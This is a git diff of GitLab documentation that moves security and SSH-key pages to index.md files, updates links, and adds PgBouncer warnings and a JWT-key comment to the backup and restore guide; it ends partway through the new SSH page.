a/doc/raketasks/backup_restore.md +++ b/doc/raketasks/backup_restore.md @@ -73,6 +73,10 @@ WARNING: GitLab does not back up any configuration files, SSL certificates, or system files. You are highly advised to read about [storing configuration files](#storing-configuration-files). +WARNING: +The backup command requires [additional parameters](#backup-and-restore-for-installations-using-pgbouncer) when +your installation is using PgBouncer, for either performance reasons or when using it with a Patroni cluster. + Depending on your version of GitLab, use the following command if you installed GitLab using the Omnibus package: @@ -817,7 +821,7 @@ data into (`gitlabhq_production`). All existing data is either erased To restore a backup, you must restore `/etc/gitlab/gitlab-secrets.json` (for Omnibus packages) or `/home/git/gitlab/.secret` (for installations from source). This file contains the database encryption key, -[CI/CD variables](../ci/variables/README.md), and +[CI/CD variables](../ci/variables/index.md), and variables used for [two-factor authentication](../user/profile/account/two_factor_authentication.md). If you fail to restore this encryption key file along with the application data backup, users with two-factor authentication enabled and GitLab Runner @@ -955,8 +959,9 @@ installed version of GitLab, the restore command aborts with an error message. Install the [correct GitLab version](https://packages.gitlab.com/gitlab/), and then try again. -NOTE: -There is a known issue with restore not working with `pgbouncer`. [Read more about backup and restore with `pgbouncer`](#backup-and-restore-for-installations-using-pgbouncer). +WARNING: +The restore command requires [additional parameters](#backup-and-restore-for-installations-using-pgbouncer) when +your installation is using PgBouncer, for either performance reasons or when using it with a Patroni cluster. Next, restore `/etc/gitlab/gitlab-secrets.json` if necessary, [as previously mentioned](#restore-prerequisites). @@ -1188,11 +1193,11 @@ The secrets file is responsible for storing the encryption key for the columns that contain required, sensitive information. If the key is lost, GitLab can't decrypt those columns, preventing access to the following items: -- [CI/CD variables](../ci/variables/README.md) +- [CI/CD variables](../ci/variables/index.md) - [Kubernetes / GCP integration](../user/project/clusters/index.md) - [Custom Pages domains](../user/project/pages/custom_domains_ssl_tls_certification/index.md) - [Project error tracking](../operations/error_tracking.md) -- [Runner authentication](../ci/runners/README.md) +- [Runner authentication](../ci/runners/index.md) - [Project mirroring](../user/project/repository/repository_mirroring.md) - [Web hooks](../user/project/integrations/webhooks.md) @@ -1290,6 +1295,9 @@ You may need to reconfigure or restart GitLab for the changes to take effect. UPDATE namespaces SET runners_token = null, runners_token_encrypted = null; -- Clear instance tokens UPDATE application_settings SET runners_registration_token_encrypted = null; + -- Clear key used for JWT authentication + -- This may break the $CI_JWT_TOKEN job variable: + -- https://gitlab.com/gitlab-org/gitlab/-/issues/325965 UPDATE application_settings SET encrypted_ci_jwt_signing_key = null; -- Clear runner tokens UPDATE ci_runners SET token = null, token_encrypted = null; diff --git a/doc/raketasks/index.md b/doc/raketasks/index.md index 799e6126a82..d3735fc7454 100644 --- a/doc/raketasks/index.md +++ b/doc/raketasks/index.md @@ -46,7 +46,7 @@ The following Rake tasks are available for use with GitLab: | [Repository storage](../administration/raketasks/storage.md) | List and migrate existing projects and attachments from legacy storage to hashed storage. | | [Uploads migrate](../administration/raketasks/uploads/migrate.md) | Migrate uploads between local storage and object storage. | | [Uploads sanitize](../administration/raketasks/uploads/sanitize.md) | Remove EXIF data from images uploaded to earlier versions of GitLab. | -| [Usage data](../administration/troubleshooting/gitlab_rails_cheat_sheet.md#generate-usage-ping) | Generate and troubleshoot [Usage Ping](../development/usage_ping/index.md). | +| [Service Data](../administration/troubleshooting/gitlab_rails_cheat_sheet.md#generate-service-ping) | Generate and troubleshoot [Service Ping](../development/service_ping/index.md). | | [User management](user_management.md) | Perform user management tasks. | | [Webhooks administration](web_hooks.md) | Maintain project webhooks. | | [X.509 signatures](x509_signatures.md) | Update X.509 commit signatures, which can be useful if the certificate store changed. | diff --git a/doc/security/README.md b/doc/security/README.md index 6af3948fdcf..5ab8653dc35 100644 --- a/doc/security/README.md +++ b/doc/security/README.md @@ -1,32 +1,8 @@ --- -stage: none -group: unassigned -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -comments: false -type: index +redirect_to: 'index.md' --- -# Security **(FREE)** +This document was moved to [another location](index.md). -- [Password storage](password_storage.md) -- [Password length limits](password_length_limits.md) -- [Generated passwords for users created through integrated authentication](passwords_for_integrated_authentication_methods.md) -- [Restrict SSH key technologies and minimum length](ssh_keys_restrictions.md) -- [Rate limits](rate_limits.md) -- [Webhooks and insecure internal web services](webhooks.md) -- [Information exclusivity](information_exclusivity.md) -- [Reset user password](reset_user_password.md) -- [Unlock a locked user](unlock_user.md) -- [User File Uploads](user_file_uploads.md) -- [How we manage the CRIME vulnerability](crime_vulnerability.md) -- [Enforce Two-factor authentication](two_factor_authentication.md) -- [Send email confirmation on sign-up](user_email_confirmation.md) -- [Security of running jobs](https://docs.gitlab.com/runner/security/) -- [Proxying images](asset_proxy.md) -- [CI/CD variables](../ci/variables/README.md#cicd-variable-security) -- [Token overview](token_overview.md) -- [Project Import decompressed archive size limits](project_import_decompressed_archive_size_limits.md) - -## Securing your GitLab installation - -Consider access control features like [Sign up restrictions](../user/admin_area/settings/sign_up_restrictions.md) and [Authentication options](../topics/authentication/) to harden your GitLab instance and minimize the risk of unwanted user account creation. +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/security/cicd_environment_variables.md b/doc/security/cicd_environment_variables.md deleted file mode 100644 index 49b10af6c1d..00000000000 --- a/doc/security/cicd_environment_variables.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'cicd_variables.md' -remove_date: '2021-05-15' ---- - -This document was moved to [another location](cicd_variables.md). - -<!-- This redirect file can be deleted after 2021-05-15. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/security/cicd_variables.md b/doc/security/cicd_variables.md index b429b1435be..06fe0ff4276 100644 --- a/doc/security/cicd_variables.md +++ b/doc/security/cicd_variables.md @@ -1,9 +1,9 @@ --- -redirect_to: '../ci/variables/README.md#cicd-variable-security' +redirect_to: '../ci/variables/index.md#cicd-variable-security' remove_date: '2021-07-04' --- -This document was moved to [another location](../ci/variables/README.md#cicd-variable-security). +This document was moved to [another location](../ci/variables/index.md#cicd-variable-security). <!-- This redirect file can be deleted after <2021-07-04>. --> <!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/security/index.md b/doc/security/index.md new file mode 100644 index 00000000000..35e93fc2c55 --- /dev/null +++ b/doc/security/index.md @@ -0,0 +1,32 @@ +--- +stage: none +group: unassigned +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +comments: false +type: index +--- + +# Security **(FREE)** + +- [Password storage](password_storage.md) +- [Password length limits](password_length_limits.md) +- [Generated passwords for users created through integrated authentication](passwords_for_integrated_authentication_methods.md) +- [Restrict SSH key technologies and minimum length](ssh_keys_restrictions.md) +- [Rate limits](rate_limits.md) +- [Webhooks and insecure internal web services](webhooks.md) +- [Information exclusivity](information_exclusivity.md) +- [Reset user password](reset_user_password.md) +- [Unlock a locked user](unlock_user.md) +- [User File Uploads](user_file_uploads.md) +- [How we manage the CRIME vulnerability](crime_vulnerability.md) +- [Enforce Two-factor authentication](two_factor_authentication.md) +- [Send email confirmation on sign-up](user_email_confirmation.md) +- [Security of running jobs](https://docs.gitlab.com/runner/security/) +- [Proxying images](asset_proxy.md) +- [CI/CD variables](../ci/variables/index.md#cicd-variable-security) +- [Token overview](token_overview.md) +- [Project Import decompressed archive size limits](project_import_decompressed_archive_size_limits.md) + +## Securing your GitLab installation + +Consider access control features like [Sign up restrictions](../user/admin_area/settings/sign_up_restrictions.md) and [Authentication options](../topics/authentication/) to harden your GitLab instance and minimize the risk of unwanted user account creation. diff --git a/doc/security/passwords_for_integrated_authentication_methods.md b/doc/security/passwords_for_integrated_authentication_methods.md index 7c4ada4435c..9931fd56e83 100644 --- a/doc/security/passwords_for_integrated_authentication_methods.md +++ b/doc/security/passwords_for_integrated_authentication_methods.md @@ -7,7 +7,7 @@ type: reference # Generated passwords for users created through integrated authentication **(FREE)** -GitLab allows users to set up accounts through integration with external [authentication and authorization providers](../administration/auth/README.md). +GitLab allows users to set up accounts through integration with external [authentication and authorization providers](../administration/auth/index.md). These authentication methods do not require the user to explicitly create a password for their accounts. However, to maintain data consistency, GitLab requires passwords for all user accounts. diff --git a/doc/security/token_overview.md b/doc/security/token_overview.md index f9655210329..c00e5bff383 100644 --- a/doc/security/token_overview.md +++ b/doc/security/token_overview.md @@ -28,7 +28,7 @@ You can limit the scope and lifetime of your OAuth2 tokens. ## Impersonation tokens -An [Impersonation token](../api/README.md#impersonation-tokens) is a special type of personal access +An [Impersonation token](../api/index.md#impersonation-tokens) is a special type of personal access token. It can be created only by an administrator for a specific user. Impersonation tokens can help you build applications or scripts that authenticate with the GitLab API, repositories, and the GitLab registry as a specific user. @@ -71,7 +71,7 @@ You can use the runner registration token to add runners that execute jobs in a After registration, the runner receives an authentication token, which it uses to authenticate with GitLab when picking up jobs from the job queue. The authentication token is stored locally in the runner's [`config.toml`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) file. -After authentication with GitLab, the runner receives a [job token](../api/README.md#gitlab-cicd-job-token), which it uses to execute the job. +After authentication with GitLab, the runner receives a [job token](../api/index.md#gitlab-cicd-job-token), which it uses to execute the job. In case of Docker Machine/Kubernetes/VirtualBox/Parallels/SSH executors, the execution environment has no access to the runner authentication token, because it stays on the runner machine. They have access to the job token only, which is needed to execute the job. @@ -79,7 +79,7 @@ Malicious access to a runner's file system may expose the `config.toml` file and ## CI/CD job tokens -The [CI/CD](../api/README.md#gitlab-cicd-job-token) job token +The [CI/CD](../api/index.md#gitlab-cicd-job-token) job token is a short lived token only valid for the duration of a job. It gives a CI/CD job access to a limited amount of API endpoints. API authentication uses the job token, by using the authorization of the user @@ -105,7 +105,7 @@ This table shows available scopes per token. Scopes can be limited further on to 1. Limited to the one project. 1. Runner registration and authentication token don't provide direct access to repositories, but can be used to register and authenticate a new runner that may execute jobs which do have access to the repository -1. Limited to certain [endpoints](../api/README.md#gitlab-cicd-job-token). +1. Limited to certain [endpoints](../api/index.md#gitlab-cicd-job-token). ## Security considerations @@ -113,7 +113,7 @@ Access tokens should be treated like passwords and kept secure. Adding them to URLs is a security risk. This is especially true when cloning or adding a remote, as Git then writes the URL to its `.git/config` file in plain text. URLs are also generally logged by proxies and application servers, which makes those credentials visible to system administrators. -Instead, API calls can be passed an access token using headers, like [the `Private-Token` header](../api/README.md#personalproject-access-tokens). +Instead, API calls can be passed an access token using headers, like [the `Private-Token` header](../api/index.md#personalproject-access-tokens). Tokens can also be stored using a [Git credential storage](https://git-scm.com/book/en/v2/Git-Tools-Credential-Storage). diff --git a/doc/ssh/README.md b/doc/ssh/README.md index 358323e4ef5..5ab8653dc35 100644 --- a/doc/ssh/README.md +++ b/doc/ssh/README.md @@ -1,385 +1,8 @@ --- -stage: Manage -group: Access -info: "To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments" -type: howto, reference +redirect_to: 'index.md' --- -# GitLab and SSH keys +This document was moved to [another location](index.md). -Git is a distributed version control system, which means you can work locally, -then share or "push" your changes to a server. In this case, the server is GitLab. - -GitLab uses the SSH protocol to securely communicate with Git. -When you use SSH keys to authenticate to the GitLab remote server, -you don't need to supply your username and password each time. - -## Prerequisites - -To use SSH to communicate with GitLab, you need: - -- The OpenSSH client, which comes pre-installed on GNU/Linux, macOS, and Windows 10. -- SSH version 6.5 or later. Earlier versions used an MD5 signature, which is not secure. - -To view the version of SSH installed on your system, run `ssh -V`. - -## Supported SSH key types - -To communicate with GitLab, you can use the following SSH key types: - -- [ED25519](#ed25519-ssh-keys) -- [RSA](#rsa-ssh-keys) -- DSA ([Deprecated](https://about.gitlab.com/releases/2018/06/22/gitlab-11-0-released/#support-for-dsa-ssh-keys) in GitLab 11.0.) -- ECDSA (As noted in [Practical Cryptography With Go](https://leanpub.com/gocrypto/read#leanpub-auto-ecdsa), the security issues related to DSA also apply to ECDSA.) - -Administrators can [restrict which keys are permitted and their minimum lengths](../security/ssh_keys_restrictions.md). - -### ED25519 SSH keys - -The book [Practical Cryptography With Go](https://leanpub.com/gocrypto/read#leanpub-auto-chapter-5-digital-signatures) -suggests that [ED25519](https://ed25519.cr.yp.to/) keys are more secure and performant than RSA keys. - -OpenSSH 6.5 introduced ED25519 SSH keys in 2014 and they should be available on most -operating systems. - -### RSA SSH keys - -Available documentation suggests that ED25519 is more secure than RSA. - -If you use an RSA key, the US National Institute of Science and Technology in -[Publication 800-57 Part 3 (PDF)](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf) -recommends a key size of at least 2048 bits. The default key size depends on your version of `ssh-keygen`. -Review the `man` page for your installed `ssh-keygen` command for details. - -## See if you have an existing SSH key pair - -Before you create a key pair, see if a key pair already exists. - -1. On Windows, Linux, or macOS, go to your home directory. -1. Go to the `.ssh/` subdirectory. If the `.ssh/` subdirectory doesn't exist, - you are either not in the home directory, or you haven't used `ssh` before. - In the latter case, you need to [generate an SSH key pair](#generate-an-ssh-key-pair). -1. See if a file with one of the following formats exists: - - | Algorithm | Public key | Private key | - | --------- | ---------- | ----------- | - | ED25519 (preferred) | `id_ed25519.pub` | `id_ed25519` | - | RSA (at least 2048-bit key size) | `id_rsa.pub` | `id_rsa` | - | DSA (deprecated) | `id_dsa.pub` | `id_dsa` | - | ECDSA | `id_ecdsa.pub` | `id_ecdsa` | - -## Generate an SSH key pair - -If you do not have an existing SSH key pair, generate a new one. - -1. Open a terminal. -1. Type `ssh-keygen -t` followed by the key type and an optional comment. - This comment is included in the `.pub` file that's created. - You may want to use an email address for the comment. - - For example, for ED25519: - - ```shell - ssh-keygen -t ed25519 -C "<comment>" - ``` - - For 2048-bit RSA: - - ```shell - ssh-keygen -t rsa -b 2048 -C "<comment>" - ``` - -1. Press Enter. Output similar to the following is displayed: - - ```plaintext - Generating public/private ed25519 key pair. - Enter file in which to save the key (/home/user/.ssh/id_ed25519): - ``` - -1. Accept the suggested filename and directory, unless you are generating a [deploy key](../user/project/deploy_keys/index.md) - or want to save in a specific directory where you store other keys. - - You can also dedicate the SSH key pair to a [specific host](#configure-ssh-to-point-to-a-different-directory). - -1. Specify a [passphrase](https://www.ssh.com/ssh/passphrase/): - - ```plaintext - Enter passphrase (empty for no passphrase): - Enter same passphrase again: - ``` - -1. A confirmation is displayed, including information about where your files are stored. - -A public and private key are generated. -[Add the public SSH key to your GitLab account](#add-an-ssh-key-to-your-gitlab-account) and keep -the private key secure. - -### Configure SSH to point to a different directory - -If you did not save your SSH key pair in the default directory, -configure your SSH client to point to the directory where the private key is stored. - -1. Open a terminal and run this command: - - ```shell - eval $(ssh-agent -s) - ssh-add <directory to private SSH key> - ``` - -1. Save these settings in the `~/.ssh/config` file. For example: - - ```conf - # GitLab.com - Host gitlab.com - PreferredAuthentications publickey - IdentityFile ~/.ssh/gitlab_com_rsa - - # Private GitLab instance - Host gitlab.company.com - PreferredAuthentications publickey - IdentityFile ~/.ssh/example_com_rsa - ``` - - For more information on these settings, see the [`man ssh_config`](https://man.openbsd.org/ssh_config) page in the SSH configuration manual. - -Public SSH keys must be unique to GitLab because they bind to your account. -Your SSH key is the only identifier you have when you push code with SSH. -It must uniquely map to a single user. - -### Update your SSH key passphrase - -You can update the passphrase for your SSH key. - -1. Open a terminal and run this command: - - ```shell - ssh-keygen -p -f /path/to/ssh_key - ``` - -1. At the prompts, type the passphrase and press Enter. - -### Upgrade your RSA key pair to a more secure format - -If your version of OpenSSH is between 6.5 and 7.8, -you can save your private RSA SSH keys in a more secure -OpenSSH format. - -1. Open a terminal and run this command: - - ```shell - ssh-keygen -o -f ~/.ssh/id_rsa - ``` - - Alternatively, you can generate a new RSA key with the more secure encryption format with - the following command: - - ```shell - ssh-keygen -o -t rsa -b 4096 -C "<comment>" - ``` - -## Add an SSH key to your GitLab account - -To use SSH with GitLab, copy your public key to your GitLab account. - -1. Copy the contents of your public key file. You can do this manually or use a script. - For example, to copy an ED25519 key to the clipboard: - - **macOS:** - - ```shell - tr -d '\n' < ~/.ssh/id_ed25519.pub | pbcopy - ``` - - **Linux** (requires the `xclip` package): - - ```shell - xclip -sel clip < ~/.ssh/id_ed25519.pub - ``` - - **Git Bash on Windows:** - - ```shell - cat ~/.ssh/id_ed25519.pub | clip - ``` - - Replace `id_ed25519.pub` with your filename. For example, use `id_rsa.pub` for RSA. - -1. Sign in to GitLab. -1. In the top right corner, select your avatar. -1. Select **Preferences**. -1. From the left sidebar, select **SSH Keys**. -1. In the **Key** box, paste the contents of your public key. - If you manually copied the key, make sure you copy the entire key, - which starts with `ssh-ed25519` or `ssh-rsa`, and may end with a comment. -1. In the **Title** text box, type a description, like _Work Laptop_ or - _Home Workstation_. -1. Optional. In the **Expires at** box, select an expiration date. (Introduced in [GitLab 12.9](https://gitlab.com/gitlab-org/gitlab/-/issues/36243).) - The expiration date is informational only, and does not prevent you from using - the key. However, administrators can view expiration dates and - use them for guidance when [deleting keys](../user/admin_area/credentials_inventory.md#delete-a-users-ssh-key). - - GitLab checks all SSH keys at 02:00 AM UTC every day. It emails an expiration notice for all SSH keys that expire on the current date. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/322637) in GitLab 13.11.) - - GitLab checks all SSH keys at 01:00 AM UTC every day. It emails an expiration notice for all SSH keys that are scheduled to expire seven days from now. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/322637) in GitLab 13.11.) -1. Select **Add key**. - -## Verify that you can connect - -Verify that your SSH key was added correctly. - -1. For GitLab.com, to ensure you're connecting to the correct server, confirm the - [SSH host keys fingerprints](../user/gitlab_com/index.md#ssh-host-keys-fingerprints). -1. Open a terminal and run this command, replacing `gitlab.example.com` with your GitLab instance URL: - - ```shell - ssh -T git@gitlab.example.com - ``` - -1. If this is the first time you connect, you should verify the - authenticity of the GitLab host. If you see a message like: - - ```plaintext - The authenticity of host 'gitlab.example.com (35.231.145.151)' can't be established. - ECDSA key fingerprint is SHA256:HbW3g8zUjNSksFbqTiUWPWg2Bq1x8xdGUrliXFzSnUw. - Are you sure you want to continue connecting (yes/no)? yes - Warning: Permanently added 'gitlab.example.com' (ECDSA) to the list of known hosts. - ``` - - Type `yes` and press Enter. - -1. Run the `ssh -T git@gitlab.example.com` command again. You should receive a _Welcome to GitLab, `@username`!_ message. - -If the welcome message doesn't appear, you can troubleshoot by running `ssh` -in verbose mode: - -```shell -ssh -Tvvv git@gitlab.example.com -``` - -## Use different keys for different repositories - -You can use a different key for each repository. - -Open a terminal and run this command: - -```shell -git config core.sshCommand "ssh -o IdentitiesOnly=yes -i ~/.ssh/private-key-filename-for-this-repository -F /dev/null" -``` - -This command does not use the SSH Agent and requires Git 2.10 or later. For more information -on `ssh` command options, see the `man` pages for both `ssh` and `ssh_config`. - -## Use different accounts on a single GitLab instance - -You can use multiple accounts to connect to a single instance of GitLab. -You can do this by using the command in the [previous topic](#use-different-keys-for-different-repositories). -However, even if you set `IdentitiesOnly` to `yes`, you cannot sign in if an `IdentityFile` exists -outside of a `Host` block. - -Instead, you can assign aliases to hosts in the `~.ssh/config` file. - -- For the `Host`, use an alias like `user_1.gitlab.com` and - `user_2.gitlab.com`. Advanced configurations - are more difficult to maintain, and these strings are easier to - understand when you use tools like `git remote`. -- For the `IdentityFile`, use the path the private key. - -```conf -# User1 Account Identity -Host <user_1.gitlab.com> - Hostname gitlab.com - PreferredAuthentications publickey - IdentityFile ~/.ssh/<example_ssh_key1> - -# User2 Account Identity -Host <user_2.gitlab.com> - Hostname gitlab.com - PreferredAuthentications publickey - IdentityFile ~/.ssh/<example_ssh_key2> -``` - -Now, to clone a repository for `user_1`, use `user_1.gitlab.com` in the `git clone` command: - -```shell -git clone git@<user_1.gitlab.com>:gitlab-org/gitlab.git -``` - -To update a previously-cloned repository that is aliased as `origin`: - -```shell -git remote set-url origin git@<user_1.gitlab.com>:gitlab-org/gitlab.git -``` - -NOTE: -Private and public keys contain sensitive data. Ensure the permissions -on the files make them readable to you but not accessible to others. - -## Configure two-factor authentication (2FA) - -You can set up two-factor authentication (2FA) for -[Git over SSH](../security/two_factor_authentication.md#two-factor-authentication-2fa-for-git-over-ssh-operations). - -## Use EGit on Eclipse - -If you are using [EGit](https://www.eclipse.org/egit/), you can [add your SSH key to Eclipse](https://wiki.eclipse.org/EGit/User_Guide#Eclipse_SSH_Configuration). - -## Use SSH on Microsoft Windows - -If you're running Windows 10, you can either use the [Windows Subsystem for Linux (WSL)](https://docs.microsoft.com/en-us/windows/wsl/install-win10) -with [WSL 2](https://docs.microsoft.com/en-us/windows/wsl/install-win10#update-to-wsl-2) which -has both `git` and `ssh` preinstalled, or install [Git for Windows](https://gitforwindows.org) to -use SSH through Powershell. - -The SSH key generated in WSL is not directly available for Git for Windows, and vice versa, -as both have a different home directory: - -- WSL: `/home/<user>` -- Git for Windows: `C:\Users\<user>` - -You can either copy over the `.ssh/` directory to use the same key, or generate a key in each environment. - -Alternative tools include: - -- [Cygwin](https://www.cygwin.com) -- [PuttyGen](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) - -## Overriding SSH settings on the GitLab server - -GitLab integrates with the system-installed SSH daemon and designates a user -(typically named `git`) through which all access requests are handled. Users -who connect to the GitLab server over SSH are identified by their SSH key instead -of their username. - -SSH *client* operations performed on the GitLab server are executed as this -user. You can modify this SSH configuration. For example, you can specify -a private SSH key for this user to use for authentication requests. However, this practice -is **not supported** and is strongly discouraged as it presents significant -security risks. - -GitLab checks for this condition, and directs you -to this section if your server is configured this way. For example: - -```shell -$ gitlab-rake gitlab:check - -Git user has default SSH configuration? ... no - Try fixing it: - mkdir ~/gitlab-check-backup-1504540051 - sudo mv /var/lib/git/.ssh/id_rsa ~/gitlab-check-backup-1504540051 - sudo mv /var/lib/git/.ssh/id_rsa.pub ~/gitlab-check-backup-1504540051 - For more information see: - [Overriding SSH settings on the GitLab server](#overriding-ssh-settings-on-the-gitlab-server) - Please fix the error above and rerun the checks. -``` - -Remove the custom configuration as soon as you can. These customizations -are **explicitly not supported** and may stop working at any time. - -## Troubleshooting SSH connections - -When you run `git clone`, you may be prompted for a password, like `git@gitlab.example.com's password:`. -This indicates that something is wrong with your SSH setup. - -- Ensure that you generated your SSH key pair correctly and added the public SSH - key to your GitLab profile. -- Try to manually register your private SSH key by using `ssh-agent`. -- Try to debug the connection by running `ssh -Tv git@example.com`. - Replace `example.com` with your GitLab URL. +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ssh/index.md b/doc/ssh/index.md new file mode 100644 index 00000000000..fd95a483344 --- /dev/null +++ b/doc/ssh/index.md @@ -0,0 +1,385 @@ +--- +stage: Manage +group: Access +info: "To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments" +type: howto, reference +--- + +# GitLab and SSH keys + +Git is a distributed version control system, which means you can work locally, +then share or "push" your changes to a server. In this case, the server is GitLab. + +GitLab uses the SSH protocol to securely communicate with Git. +When you use SSH keys to authenticate to the GitLab remote server, +you don't need to supply your username and password each time. + +## Prerequisites + +To use SSH to communicate with GitLab, you need: + +- The OpenSSH client, which comes pre-installed on GNU/Linux, macOS, and Windows 10. +- SSH version 6.5 or later. Earlier versions used an MD5 signature, which is not secure. + +To view the version of SSH installed on your system, run `ssh -V`. + +## Supported SSH key types + +To communicate with GitLab, you can use the following SSH key types: + +- [ED25519](#ed25519-ssh-keys) +- [RSA](#rsa-ssh-keys) +- DSA ([Deprecated](https://about.gitlab.com/releases/2018/06/22/gitlab-11-0-released/#support-for-dsa-ssh-keys) in GitLab 11.0.) +- ECDSA (As noted in [Practical Cryptography With Go](https://leanpub.com/gocrypto/read#leanpub-auto-ecdsa), the security issues related to DSA also apply to ECDSA.) + +Administrators can [restrict which keys are permitted and their minimum lengths](../security/ssh_keys_restrictions.md). + +### ED25519 SSH keys + +The book [Practical Cryptography With Go](https://leanpub.com/gocrypto/read#leanpub-auto-chapter-5-digital-signatures) +suggests that [ED25519](https://ed25519.cr.yp.to/) keys are more secure and performant than RSA keys. + +OpenSSH 6.5 introduced ED25519 SSH keys in 2014 and they should be available on most +operating systems. + +### RSA SSH keys + +Available documentation suggests that ED25519 is more secure than RSA. + +If you use an RSA key, the US National Institute of Science and Technology in +[Publication 800-57 Part 3 (PDF)](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf) +recommends a key size of at least 2048 bits. The default key size depends on your version of `ssh-keygen`. +Review the `man` page for your installed `ssh-keygen` command for details. + +## See if you have an existing SSH key pair + +Before you create a key pair, see if a key pair already exists. + +1. On Windows, Linux, or macOS, go to your home directory. +1. Go to the `.ssh/` subdirectory. If the `.ssh/` subdirectory doesn't exist, + you are either not in the home directory, or you haven't used `ssh` before. + In the latter case, you need to [generate an SSH key pair](#generate-an-ssh-key-pair). +1. See if a file with one of the following formats exists: + + | Algorithm | Public key | Private key | + | --------- | ---------- | ----------- | + | ED25519 (preferred) | `id_ed25519.pub` | `id_ed25519` | + | RSA (at least 2048-bit key size) | `id_rsa.pub` | `id_rsa` | + | DSA (deprecated) | `id_dsa.pub` | `id_dsa` | + | ECDSA | `id_ecdsa.pub` | `id_ecdsa` | + +## Generate an SSH key pair + +If you do not have an existing SSH key pair, generate a new one. + +1. Open a terminal. +1. Type `ssh-keygen -t` followed by the key type and an optional comment. + This comment is included in the `.pub` file that's created. + You may want to use an email address for the comment. + + For example, for ED25519: + + ```shell + ssh-keygen -t ed25519 -C "<comment>" + ``` + + For 2048-bit RSA: + + ```shell + ssh-keygen -t rsa -b 2048 -C "<comment>" + ``` + +1. Press Enter. Output similar to the following is displayed: + + ```plaintext + Generating public/private ed25519 key pair. + Enter file in which to save the key (/home/user/.ssh/id_ed25519): + ``` + +1. Accept the suggested filename and directory, unless you are generating a [deploy key](../user/project/deploy_keys/index.md) + or want to save in a specific directory where you store other keys. + + You can also dedicate the SSH key pair to a [specific host](#configure-ssh-to-point-to-a-different-directory). + +1. Specify a [passphrase](https://www.ssh.com/ssh/passphrase): + + ```plaintext + Enter passphrase (empty for no passphrase): + Enter same passphrase again: + ``` + +1. A confirmation is displayed, including information about where your files are stored. + +A public and private key are generated. +[Add the public SSH key to your GitLab account](#add-an-ssh-key-to-your-gitlab-account) and keep +the private key secure. + +### Configure SSH to point to a different directory + +If you did not save your SSH key pair in the default directory, +configure your SSH client to point to the directory where the private key is stored. + +1. Open a terminal and run this command: + + ```shell + eval $(ssh-agent -s) + ssh-add <directory to private SSH key> + ``` + +1. Save these settings in the `~/.ssh/config` file. For example: + + ```conf + # GitLab.com + Host gitlab.com + PreferredAuthentications publickey + IdentityFile ~/.ssh/gitlab_com_rsa + + # Private GitLab instance + Host gitlab.company.com + PreferredAuthentications publickey + IdentityFile ~/.ssh/example_com_rsa + ``` + + For more information on these settings, see the [`man ssh_config`](https://man.openbsd.org/ssh_config) page in the SSH configuration manual. + +Public SSH keys must be unique to GitLab because they bind to your account. +Your SSH key is the only identifier you have when you push code with SSH. +It must uniquely map to a single user. + +### Update your SSH key passphrase + +You can update the passphrase for your SSH key. + +1. Open a terminal and run this command: + + ```shell + ssh-keygen -p -f /path/to/ssh_key + ``` + +1. At the prompts, type the passphrase and press Enter. + +### Upgrade your RSA key pair to a more secure format + +If your version of OpenSSH is between 6.5 and 7.8, +you can save your private RSA SSH keys in a more secure +OpenSSH format. + +1. Open a terminal and run this command: + + ```shell + ssh-keygen -o -f ~/.ssh/id_rsa + ``` + + Alternatively, you can generate a new RSA key with the more secure encryption format with + the following command: + + ```shell + ssh-keygen -o -t rsa -b 4096 -C "<comment>" + ``` + +## Add an SSH key to your GitLab account + +To use SSH with GitLab, copy your public key to your GitLab account. + +1. Copy the contents of your public key file. You can do this manually or use a script. + For example, to copy an ED25519 key to the clipboard: + + **macOS:** + + ```shell + tr -d '\n' < ~/.ssh/id_ed25519.pub | pbcopy + ``` + + **Linux** (requires the `xclip` package): + + ```shell + xclip -sel clip < ~/.ssh/id_ed25519.pub + ``` + + **Git Bash on Windows:** + + ```shell + cat ~/.ssh/id_ed25519.pub | clip + ``` + + Replace `id_ed25519.pub` with your filename. For example, use `id_rsa.pub` for RSA. + +1. Sign in to GitLab. +1. In the top right corner, select your avatar. +1. Select **Preferences**. +1. From the left sidebar, select **SSH Keys**. +1. In the **Key** box, paste the contents of your public key. + If you manually copied the key, make sure you copy the entire key, + which starts with `ssh-ed25519` or `ssh-rsa`, and may end with a comment. +1. In the **Title** text box, type a description, like _Work Laptop_ or + _Home Workstation_. +1. Optional. In the **Expires at** box, select an expiration date. (Introduced in [GitLab 12.9](https://gitlab.com/gitlab-org/gitlab/-/issues/36243).) + The expiration date is informational only, and does not prevent you from using + the key. However, administrators can view expiration dates and + use them for guidance when [deleting keys](../user/admin_area/credentials_inventory.md#delete-a-users-ssh-key). + - GitLab checks all SSH keys at 02:00 AM UTC every day. It emails an expiration notice for all SSH keys that expire on the current date. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/322637) in GitLab 13.11.) + - GitLab checks all SSH keys at 01:00 AM UTC every day. It emails an expiration notice for all SSH keys that are scheduled to expire seven days from now. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/322637) in GitLab 13.11.) +1. Select **Add key**. + +## Verify that you can connect + +Verify that your SSH key was added correctly. + +1. For GitLab.com, to ensure you're connecting to the correct server, confirm the + [SSH host keys 